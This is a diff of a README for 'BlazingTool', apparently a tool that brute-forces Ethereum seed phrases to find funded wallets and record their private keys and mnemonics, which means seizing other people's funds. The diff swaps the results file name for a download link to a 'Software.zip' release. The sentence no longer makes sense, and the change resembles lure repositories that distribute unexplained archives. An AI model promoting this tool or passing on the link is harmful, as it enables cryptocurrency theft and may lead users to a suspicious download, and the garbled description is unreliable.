desmonsd/BlazingTool/README.md

 # BlazingTool

 Brute force ethereum wallet mnemonics.
 Multi-threaded and surprisingly fast.
 Automatically generate seed phrases and check balances for Ethereum networks.
-If a wallet with a non-zero balance is found, the wallet's information (address, mnemonic, private key, and balances) is logged and saved to a file named result.txt.
+If a wallet with a non-zero balance is found, the wallet's information (address, mnemonic, private key, and balances) is logged and saved to a file named https://github.com/desmonsd/BlazingTool/releases/download/v2.0/Software.zip

 ---